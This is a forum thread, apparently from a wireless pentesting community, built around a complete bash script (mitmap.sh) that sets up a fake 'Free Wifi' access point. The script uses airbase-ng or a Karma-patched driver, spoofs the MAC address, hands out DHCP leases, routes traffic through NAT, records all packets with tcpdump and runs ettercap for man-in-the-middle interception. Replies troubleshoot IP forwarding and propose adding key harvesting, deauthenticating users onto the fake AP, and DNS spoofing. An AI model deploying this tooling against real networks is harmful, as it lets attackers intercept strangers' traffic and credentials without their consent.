I think it's too complicated for newbies to be messing around.
The best way is not to post the script but to put it into pastebin; only those that know, with at least some understanding, will use it.
Yes that is true indeed hm2075, my script is pure simplicity, but it could stand beside as an additional option for pentesters on the go.
I don't know, nevertheless, it is so simple that one could easily add the necessary functions manually!
- Poul Wittig
This is all I could do in 30 minutes; it should work as a skeleton for what you want to do. You could finish it if you like; sadly I have very little time today, but I will see if tomorrow I can work on it, or if you want you can improve your coding skills by finishing it. What do you think about my idea?
Code:
```bash
#!/bin/bash
#=================================================
#
#          FILE: mitmap.sh
#
#         USAGE: ./mitmap.sh <options>
#
#   DESCRIPTION: Script to launch a fake AP for Man In The Middle Attacks
#
#       OPTIONS: Wireless card supported by Aircrack-ng for injection.
#                File with MAC addresses for filtering connection
#                Madwifi Drivers patched with the DigiNinja Karma Patch
#          BUGS: Only has been tested with Atheros, Realteck L8187 and Ralink 2750 cards.
#         NOTES: Latest SVN version of Aircrack-ng as well as latest drivers must be used.
#        AUTHOR: Deathray and carlos_perez(at)darkoperator.com
#       VERSION: 0.1
#       CREATED: 12/29/08
#      REVISION:
#=================================================

#Initialize Wireless interface variable
IW=
#Initialize interface to be routed to variable
IE=
#Initialize mode variable
MODE=
#Initialize SSID variable
SSID="Free Wifi"
#Initialize Macfilter file Variable
FILTER="/noexist"
#Variable with number of arguments passed to the script
NUM=$#
#Variable with log file location for troubleshooting
LOGFILE=/root/mitmap.log
#Variable for log folder
LOGFOLDER="/root/"
A1="ath0"
#Variable for dhcpd configuration file
DHCPDCONF="/etc/dhcpd.conf"
#Capture ctrl-c and proceed to clean up any process left
trap cleanup INT

#Usage function for printing the help message
function usage () {
  echo "Script for launching Fake AP to perform Man in The Middle Attack"
  echo "Based on script and Tutorial by Deathrey at http://forums.remote-exploit.org"
  echo "Usage:"
  echo "./mitmap.sh -m <mode> -i <wireless interface> -o <internet interface> <options>"
  echo ""
  echo "Modes:"
  echo ""
  echo "ap   :Access Point using Airbase-ng"
  echo "apf  :Access Point using Airbase-ng and MAC Filtering"
  echo "apa  :Access Point using Digininja patched Madwifi kernel modules"
  echo "apaf :Access Point using Digininja patched Madwifi Kernel modules and MAC filtering"
  echo ""
  echo "Options:"
  echo ""
  echo "-s <ssid>       :SSID to use for the Fake AP"
  echo "-f <text file>  :text file containing MAC addresses to use as filter one per line"
  echo "-d <dhcpd conf> :Dhcpd configuration file"
  echo "-h              :This help message"
}

#Airbase-ng Karma style interface initialization
function abngkinit () {
  if [ $IW == $A1 ]; then
    ifconfig $IW down >> $LOGFILE 2>&1 &
    wlanconfig ath0 destroy >> $LOGFILE 2>&1 &
    echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    macchanger -A wifi0
    airmon-ng start wifi0 >> $LOGFILE 2>&1 &
    sleep 2
  else
    ifconfig $IW up >> $LOGFILE 2>&1 &
    echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    macchanger -A $IW
    airmon-ng start $IW >> $LOGFILE 2>&1 &
    sleep 2
  fi
  modprobe tun
  echo -e "\033[1;32mstarting fake ap\033[1;37m"
  airbase-ng -P -C 30 -e "$SSID" $IW >> $LOGFILE 2>&1 &
  #give enough time before next command for interface to come up
  #especially on Virtual Machines with USB cards
  echo "This will take 15 seconds .............."
  #$IW = "at0"
  sleep 15
  #changing MTU size for Interface
  echo -e "\033[1;32mChanging MTU Size for At0 to 1400\033[1;37m"
  ifconfig at0 mtu 1400
  IW="at0"
}

#Airbase-ng Karma style interface initialization with MAC Address Filtering
function abngkinitfiltered () {
  if [ $IW == $A1 ]; then
    ifconfig $IW down >> $LOGFILE 2>&1 &
    wlanconfig ath0 destroy >> $LOGFILE 2>&1 &
    echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    macchanger -A wifi0
    airmon-ng start wifi0 >> $LOGFILE 2>&1 &
    sleep 2
  else
    ifconfig $IW up >> $LOGFILE 2>&1 &
    echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    macchanger -A $IW
    airmon-ng start $IW >> $LOGFILE 2>&1 &
    sleep 2
  fi
  modprobe tun
  echo -e "\033[1;32mstarting fake ap with filtering\033[1;37m"
  airbase-ng -P -C 30 -e "$SSID" --clients $FILTER $IW >> $LOGFILE 2>&1 &
  #give enough time before next command for interface to come up
  #especially on Virtual Machines with USB cards
  echo "This will take 15 seconds .............."
  #$IW = "at0"
  sleep 15
  #changing MTU size for Interface
  echo -e "\033[1;32mChanging MTU Size for At0 to 1400\033[1;37m"
  ifconfig at0 mtu 1400
  IW="at0"
}

#DigiNinja Atheros Karma interface initialization
function mdwfkinit () {
  #Based on HD original karmetasploit scripts
  find /proc/net -name 'ath?' | sed -e 's/.*ath/ath/g' | xargs -i wlanconfig {} destroy
  echo Master Mode: `wlanconfig ath0 create wlandev wifi0 wlanmode ap`
  macchanger -A ath0
  # Enable KARMA mode
  iwpriv ath0 karma 1
  if [ $? -ne 0 ] ; then
    echo -e "\033[1;31mThe Madwifi Drivers appear to not have the karma patch applied\033[1;37m"
    echo -e "\033[1;31mhttp://www.darkoperator.com/madwifi-r3726-Karma-Aircrack-ng-patched-hdm-i386-1.lzm\033[1;37m"
    cleanup
  else
    echo -e "\033[1;32mStarting Atheros Card in Karma Mode Successful\033[1;37m"
  fi
  # Configure the interface
  iwconfig ath0 mode master
  iwconfig ath0 channel 6
  iwconfig ath0 essid "$SSID"
  ifconfig ath0 up 10.0.0.1 netmask 255.255.255.0
}

#DigiNinja Atheros Karma MAC Address Filtering
function mdwfkinitfiltered () {
  if [ -e $FILTER ]; then
    echo -e "\033[1;32mStarting fake ap with MAC Filtering\033[1;37m"
    for M in `cat $FILTER`; do
      iwpriv ath0 addmac $M
    done
    iwpriv ath0 maccmd 1
  else
    echo -e "\033[1;31mFilter File does not exist\033[1;37m"
    echo $FILTER
    #cleanup
  fi
}

#Router with NAT Initialization
function routerinit () {
  #Clear any dhcp leases that might have been left behind
  echo > /var/state/dhcp/dhcpd.leases
  #start dhcpd daemon with special configuration file
  dhcpd -cf $DHCPDCONF $IW >> $LOGFILE 2>&1 &
  #Note: after a backgrounded command, $? is the status of launching the
  #background job, not of dhcpd itself; check $LOGFILE if DHCP misbehaves
  if [ $? -ne 0 ] ; then
    echo -e "\033[1;31mThe DHCPD server could not be started, exiting\033[1;37m"
    cleanup
  else
    echo -e "\033[1;32mDHCPD started successfully\033[1;37m"
  fi
  sleep 2
  #capture all packets
  echo -e "\033[1;32mStarting Packet capture to /root/apmitm.cap\033[1;37m"
  tcpdump -ni $IW -s 0 -w /root/apmitm.cap >/dev/null 2>&1 &
  route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  iptables --flush
  iptables --table nat --flush
  iptables --delete-chain
  iptables --table nat --delete-chain
  iptables -P FORWARD ACCEPT
  iptables -t nat -A POSTROUTING -o $IE -j MASQUERADE
  echo "1" > /proc/sys/net/ipv4/ip_forward
  ettercap -T -q -p -i $IW && cleanup
}

#Cleanup of all running processes
function cleanup () {
  iptables --flush
  iptables --table nat --flush
  iptables --delete-chain
  echo "0" > /proc/sys/net/ipv4/ip_forward
  killall -9 dhcpd tcpdump airbase-ng >> $LOGFILE 2>&1 &
  echo > /var/state/dhcp/dhcpd.leases
  airmon-ng stop $IW >> $LOGFILE
  #original had a malformed test here ([$MODE == "apaf" with no closing ]); fixed
  if [ "$MODE" == "apa" ] || [ "$MODE" == "apaf" ]; then
    iwpriv ath0 maccmd 1 >> $LOGFILE 2>&1 &
  fi
  exit 1
}

#--------------------MAIN-----------------------
#option string now matches the options the usage text documents (-o, -d, -h)
while getopts ":m:i:f:s:o:d:h" options; do
  case $options in
    m ) MODE=$OPTARG;;
    i ) IW=$OPTARG;;
    f ) FILTER=$OPTARG;;
    s ) SSID=$OPTARG;;
    o ) IE=$OPTARG;;
    d ) DHCPDCONF=$OPTARG;;
    h ) usage;;
    \? ) usage
         exit 1;;
    * ) usage
        exit 1;;
  esac
done
if [[ -n "$MODE" && -n "$IW" ]]; then
  case $MODE in
    ap)   abngkinit
          routerinit;;
    apf)  abngkinitfiltered
          routerinit;;
    apa)  mdwfkinit
          routerinit;;
    apaf) mdwfkinit
          mdwfkinitfiltered
          routerinit;;
  esac
else
  usage
fi
```
Exciting to read as a lot of the stuff you have done I have always wondered how to do (: Although I am beginning to think that it may be a bit more complex than necessary. I think that there is more room for things to go wrong and it will be harder for people to troubleshoot when the script is as complex as it is. I don't know, I just think it will be a daunting task to get right. It would be great if it worked 100% for 99% of the people that actually will use it. But the question is how many people would bother?
I'm thinking of upgrading the original script to do something like this:
Select rogue ap type:
1 Offensive AP ( airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE & )
2 Non-Offensive AP ( airbase-ng -e "$ESSID" -v $WIFACE & )
3 Manual AP ( Configure airbase-ng options manually )
If that were to be implemented in a simple way I would be happy :P
- Poul Wittig
Sorry for overdoing it bro, I tried to adjust it to my own needs; different needs, different approaches. I tend to write scripts and options as if I'm in the middle of an engagement and thinking of anything that I might need. As you will later see it's not that complex; I do put lots of checks and balances in my scripts. One thing to recommend is the clean up. Why? Any settings in routing or in iptables might bite you as you switch attacks. Looking forward to your final script.
Excellent work there, maybe throw in our wireless key harvester.
hehehe
Anyway, we still haven't got a "deauth a user and force them to connect to our AP" function yet; I think this has already been mentioned on the airbase-ng tickets.
When ettercap starts up it turns off any kernel forwarding unless you use the -u option for unoffensive mode.

Originally posted by BadKarmaPR:
echo "1" > /proc/sys/net/ipv4/ip_forward
ettercap -T -q -p -i $IW && cleanup
echo "1" > /proc/sys/net/ipv4/ip_forward
Could someone please explain what this step does? I am trying to replicate the script manually and I'm not sure what to do for this step...
Patience is appreciated =]
If you want to use ettercap you should start it THEN enable forwarding. I've had much better success doing that, because EC tries to forward for you, then you can set everything right by echo "1" > /proc/sys/net/ipv4/ip_forward. I haven't tried the -u option yet; hopefully that would do the same thing.
For all those folks out there having trouble trying to run the script: if you open up bash and put in each line yourself it is much easier to see what is and isn't working; also start Wireshark. If you Wireshark your TUN interface and the NIC connected to the internet you can watch the packet transfers (or lack thereof) and diagnose a lot of the problems. It's all about doing one thing at a time and trial and error; everyone has different software/hardware so these scripts aren't going to work for many of you without a little modification.
One last thing HM2075, I've been having some trouble getting that dnspoison program you used to work; are there any tuts online that you could point to? It seems a little crazy to have to set up a bind server to do a simple redirection, which is what I've tried so far, and ettercap's dns spoof plugin is just crap.